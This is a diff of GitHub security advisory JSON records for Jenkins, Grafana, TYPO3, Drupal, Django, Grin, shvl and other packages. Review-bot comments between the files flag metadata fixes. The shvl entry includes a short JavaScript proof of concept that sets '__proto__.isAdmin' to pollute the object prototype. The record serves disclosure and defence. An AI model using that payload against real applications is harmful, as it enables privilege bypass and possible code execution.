@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqj3-fc39-73fj", + "modified": "2024-01-30T21:24:54Z", + "published": "2022-05-24T22:00:03Z", + "aliases": [ + "CVE-2019-10324" + ], + "summary": "Cross-site request forgery vulnerability in Jenkins Artifactory Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Artifactory Plugin 3.2.2 and earlier in ReleaseAction#doSubmit, GradleReleaseApiAction#doStaging, MavenReleaseApiAction#doStaging, and UnifiedPromoteBuildAction#doSubmit allowed attackers to schedule a release build, perform release staging for Gradle and Maven projects, and promote previously staged builds, respectively.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:artifactory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.2.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10324" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/artifactory-plugin/commit/687cc2b4e9ad62c0bdcee4afc9e8e90c5089ee58" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1347" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:54Z", + "nvd_published_at": "2019-05-31T15:29:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json b/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json new file mode 100644 index 0000000000000..d49b1b9e6dc14 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvpr-q6rh-8vrp", + "modified": "2024-02-01T21:48:06Z", + "published": "2022-05-24T17:32:32Z", + "aliases": [ + "CVE-2020-24303" + ], + "summary": "Grafana XSS via a query alias for the ElasticSearch datasource", + "details": "Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.1.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24303" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/25401" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#710-beta-1-2020-07-01" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20201123-0002/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:48:06Z", + "nvd_published_at": "2020-10-28T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json b/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json new file mode 100644 index 0000000000000..06f39887e3223 --- /dev/null 
+++ b/advisories/github-reviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json 
@@ -0,0 +1,116 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwqv-jff6-5v62", + "modified": "2024-02-08T00:03:06Z", + "published": "2022-05-17T05:47:13Z", + "aliases": [ + "CVE-2010-3715" + ], + "summary": "TYPO3 cross-site scripting (XSS) vulnerability in the RemoveXSS function and the backend", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3715" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/38ec239a35d50746a2f95eef004227acd1932b81" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/aba23d6f12775d31acd9b7197d5eeddca09d3574" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ce47d8dcdc2cd67b7866a3a53d36aa8203311780" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": 
"https://web.archive.org/web/20111220151231/http://www.securityfocus.com/bid/43786" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2121" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T00:03:06Z", + "nvd_published_at": "2010-10-25T20:01:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json b/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json new file mode 100644 index 0000000000000..68e2f7608c6d7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json 
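Review bot: GHSA-mwqv-jff6-5v62 lists only `typo3/cms-backend` as affected, but the first vector in the details — the `RemoveXSS` function — is part of the t3lib core library rather than the backend module, and the sibling TYPO3 advisory in this batch (GHSA-m7rg-85g8-28m9) maps a t3lib function to `typo3/cms-core`. If that mapping is right, `typo3/cms-core` should carry the same three ranges here (`4.2.0`–`4.2.15`, `4.3.0`–`4.3.7`, `4.4.0`–`4.4.4`) so that projects depending on core alone are flagged; worth confirming against the TYPO3 bulletin (typo3-sa-2010-020) and the three linked commits before merging.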
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3g4-9xfv-wq9v", + "modified": "2024-01-30T23:18:21Z", + "published": "2022-05-14T03:40:05Z", + "aliases": [ + "CVE-2018-1000058" + ], + "summary": "Arbitrary code execution due to incomplete sandbox protection in Pipeline: Supporting APIs Plugin", + "details": "Jenkins Pipeline: Supporting APIs Plugin 2.17 and earlier have an arbitrary code execution due to incomplete sandbox protection: Methods related to Java deserialization like readResolve implemented in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins.workflow:workflow-support" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.18" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.17" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000058" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-05/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/103034" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:21Z", + "nvd_published_at": "2018-02-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json b/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json new file mode 100644 index 0000000000000..54d59da2ffde7 
--- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p498-rpcw-3578", + "modified": "2024-01-30T22:41:12Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000012" + ], + "summary": "XXE vulnerability Jenkins Warnings Plugin", + "details": "Jenkins Warnings Plugin 4.64 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:warnings" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.65" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.64" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000012" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:41:12Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json b/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json new file mode 100644 index 0000000000000..a2a116dbdbb22 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json 
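Review bot: The `summary` of GHSA-p498-rpcw-3578 reads "XXE vulnerability Jenkins Warnings Plugin" and is missing a preposition; `"summary": "XXE vulnerability in Jenkins Warnings Plugin"` matches the phrasing of the other Jenkins advisories in this batch. `fixed: "4.65"` and `last_known_affected_version_range: "<= 4.64"` agree with the details, and the vector's `PR:L` matches the "attackers with user permissions" description.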
@@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6m5-h7pp-v2x5", + "modified": "2024-02-08T22:00:20Z", + "published": "2022-05-02T03:47:43Z", + "aliases": [ + "CVE-2009-3695" + ], + "summary": "Django's Insufficient Algorithmic Complexity Causes Denial of Service", + "details": "Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular expression.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "fixed": "1.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "Django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1" + }, + { + "fixed": "1.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3695" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53727" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228171918/http://www.securityfocus.com/bid/36655" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550457" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/django-users/browse_thread/thread/15df9e45118dfc51/" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2009/dsa-1905" + }, + { + "type": "WEB", + "url": "http://www.djangoproject.com/weblog/2009/oct/09/security/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2009/10/13/6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-407" + ], 
+ "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:00:20Z", + "nvd_published_at": "2009-10-13T10:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json b/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json new file mode 100644 index 0000000000000..1824738d9792d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p75g-gcv5-42qg", + "modified": "2024-02-01T21:47:51Z", + "published": "2022-05-24T17:24:33Z", + "aliases": [ + "CVE-2020-15899" + ], + "summary": "Grin insufficient data validation", + "details": "Grin 3.0.0 before 4.0.0 has insufficient validation of data related to Mimblewimble.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "4.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15899" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-15899.md" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/compare/v3.1.1...v4.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:51Z", + "nvd_published_at": "2020-07-28T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json b/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json index 38cb548509803..f61feb59c0c65 100644 
--- a/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json +++ b/advisories/github-reviewed/2022/05/GHSA-p9hp-3gpv-52w3/GHSA-p9hp-3gpv-52w3.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework1" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.19" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://framework.zend.com/security/advisory/ZF2016-02" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2016-6233.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/zendframework/zendframework" diff --git a/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json b/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json index 030aa3ccf2255..358367fcff87c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json +++ b/advisories/github-reviewed/2022/05/GHSA-p9vf-4jx2-5hpp/GHSA-p9vf-4jx2-5hpp.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8112" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8112.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json b/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json new file mode 100644 index 0000000000000..efd62b432549e --- /dev/null 
+++ b/advisories/github-reviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjmx-4gc6-hwv8", + "modified": "2024-02-08T15:36:31Z", + "published": "2022-05-17T05:48:23Z", + "aliases": [ + "CVE-2010-3094" + ], + "summary": "Drupal cross-site scripting vulnerability via actions feature and trigger module", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "6.18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3094" + }, + { + "type": "WEB", + "url": "https://github.com/drupal/drupal/commit/4e8e0454b3bfc3b846cf4b7bcaca0e8f42f0c17a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/drupal/drupal" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120915000000*/http://www.securityfocus.com/bid/42391" + }, + { + "type": "WEB", + "url": "http://drupal.org/node/880476" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=128418560705305&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=128440896914512&w=2" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2113" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:36:31Z", + "nvd_published_at": "2010-09-21T20:00:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json b/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json
new file mode 100644
index 0000000000000..8038eccd62219
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-pqqj-299w-wf53",
+  "modified": "2024-02-01T21:49:08Z",
+  "published": "2022-05-24T17:27:18Z",
+  "aliases": [
+    "CVE-2020-23814"
+  ],
+  "summary": "xxl-job Multiple cross-site scripting (XSS) vulnerabilities",
+  "details": "Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "com.xuxueli:xxl-job"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.3.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23814"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/xuxueli/xxl-job/issues/1866"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/xuxueli/xxl-job/commit/227628567354d3c156951009d683c6fec3006e0e"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.ccsq8.com/issues.html"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2024-02-01T21:49:08Z",
+    "nvd_published_at": "2020-09-03T17:15:00Z"
+  }
+}
\ No newline at end of file
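Review bot: `"cwe_ids"` is left as an empty array although the summary and the details in the same file both describe cross-site scripting; the other XSS advisory added in this commit (GHSA-pjmx-4gc6-hwv8) classifies it as `"CWE-79"`, and the same value belongs here so the advisory is searchable by weakness class. The details string also has a missing space in `(2)AddressList`. The range `"introduced": "0"` / `"fixed": "2.3.0"` is broader than the prose, which names only v2.2.0; if 2.3.0 is the confirmed fix this is fine, otherwise a `"last_known_affected_version_range"` entry in `database_specific` would record what is actually known, as the Jenkins entries in this commit do.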
diff --git a/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json b/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json new file mode 100644 index 0000000000000..8208bbc4150a4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json 
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqwc-3vhw-qcvq", + "modified": "2024-02-01T21:00:24Z", + "published": "2022-05-24T17:37:25Z", + "aliases": [ + "CVE-2020-28278" + ], + "summary": "shvl vulnerable to prototype pollution", + "details": "### Overview\nPrototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module 'shvl' can be abused by Prototype Pollution vulnerability since the function 'set()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC Details\nThe 'set()' function accepts four arguments `object, path, val, obj`. Due to the absence of validation, at values passed into `path, val` arguments, an attacker can supply a malicious value by adjusting the `path` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `path` is the Object's own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst shvl = require('shvl');\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\nshvl.set(obj, '__proto__.isAdmin', true);\nconsole.log(\"After : \" + obj.isAdmin);\n```\n\n### Affected Environments\n1.0.0-2.0.1\n\n### Remediation\nThere are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn’t allow to add, remove, or change its properties. 
Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won’t have any prototype association by using “Object.create”.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "shvl" + }, + "ecosystem_specific": { + "affected_functions": [ + "(shvl).set" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "2.0.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/issues/34" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/pull/36" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/commit/513c0848774dfb114ad0d0554abf7927cfdd569e" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210320222933/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:00:24Z", + "nvd_published_at": "2020-12-29T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json b/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json index 238f97fb324a3..22ee5d1e989b4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json +++ b/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json 
@@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7915" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7915.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json b/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json new file mode 100644 index 0000000000000..84557a1ad0919 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv88-89rq-9fg6", + "modified": "2024-01-30T21:20:31Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10389" + ], + "summary": "Missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin ", + "details": "A missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin 1.24 and earlier allows attackers to have Jenkins initiate an HTTP connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:relution-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.24" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10389" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1053" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:31Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json b/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json new file mode 100644 index 0000000000000..9101a55691182 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json 
